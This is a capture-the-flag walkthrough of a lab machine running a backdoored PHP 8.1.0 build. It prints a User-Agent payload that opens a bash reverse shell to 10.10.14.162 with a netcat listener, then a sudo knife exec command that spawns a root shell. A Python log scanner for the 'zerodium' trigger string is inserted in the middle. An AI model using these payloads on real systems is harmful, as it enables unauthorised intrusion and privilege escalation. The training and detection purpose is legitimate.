So let's go to the browser and see what web server is running on port 80.
I tried to enumerate the HTTP web server first by
- taking a look at source code for comments and anything interesting
- directory brute-forcing
- trying to find version exploits for services
But no luck with any of them. Then I saw Wappalyzer showed PHP running, specifically
PHP 8.1.0, so I went to Google and searched for an exploit.
I found there are 2 ways to get a user shell:
Here you'll find a Python script that gets a user shell simply by running the script and giving it a URL.
Or we can look at the HTTP request in our fav buddy Burp.
Send it to Repeater. We are going to get a reverse shell by forwarding the request with a new User-Agent and listening on a port via netcat:
User-Agent: zerodiumsystem("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.162/1234 0>&1'");
and open a listener in another tab:
nc -nvlp 1234
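Added example, not from the original post: a small Python checker that a defender could run over web server access logs (Apache/Nginx "combined" format) to flag requests whose User-Agent carries the "zerodium" trigger string the backdoored PHP build above responds to. The log lines are constructed for the example.

```python
import re
from typing import Optional

# Constructed sample access log lines (combined format); not taken from a real host.
# Apache escapes double quotes inside the User-Agent field as \" .
SAMPLE_LOG = r"""
10.10.14.162 - - [15/May/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 5815 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/88.0"
10.10.14.162 - - [15/May/2021:12:00:05 +0000] "GET / HTTP/1.1" 200 5815 "-" "zerodiumsystem(\"id\");"
10.10.14.162 - - [15/May/2021:12:00:09 +0000] "GET /index.php HTTP/1.1" 200 5815 "-" "ZeroDiumvar_dump(1);"
10.10.14.7 - - [15/May/2021:12:01:00 +0000] "POST /login HTTP/1.1" 302 0 "-" "curl/7.68.0"
"""

# Combined log format; the user-agent group tolerates backslash-escaped quotes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>(?:[^"\\]|\\.)*)"\s*$'
)

# The backdoor is triggered by a User-Agent starting with "zerodium"; match
# case-insensitively so casing variants are caught as well.
TRIGGER = re.compile(r"zerodium", re.IGNORECASE)


def parse_combined(line: str) -> Optional[dict]:
    """Return the fields of one combined-format log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_backdoor_attempts(log_text: str) -> list:
    """Return one alert dict per request whose User-Agent contains the trigger string."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_combined(line)
        if rec is None or not TRIGGER.search(rec["ua"]):
            continue
        payload = rec["ua"].replace('\\"', '"')  # undo Apache's quote escaping
        hits.append({"ip": rec["ip"], "ts": rec["ts"], "payload": payload})
    return hits


if __name__ == "__main__":
    for hit in find_backdoor_attempts(SAMPLE_LOG):
        print(f"[ALERT] {hit['ip']} at {hit['ts']}: {hit['payload']}")
```

Any hit here is a strong indicator that the exposed PHP build is the backdoored one and that someone has already tried to use it.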
Now you can easily find the user flag, I suppose.
Let's move to priv esc.
On sudo -l we saw we can run /usr/bin/knife without a password.
After a little enumeration, you'll find how easy it is to get a root shell.
With further enumeration I found out a knife instance is running.
Google "knife exploit" and read the docs.
Reading through the documentation, you'll see we can run Ruby scripts or Ruby code, as stated below:
Run the following command:
sudo knife exec --exec "exec '/bin/sh -i'"
And there we go, we have successfully rooted the box.
Thanks for the read Please do share and follow me.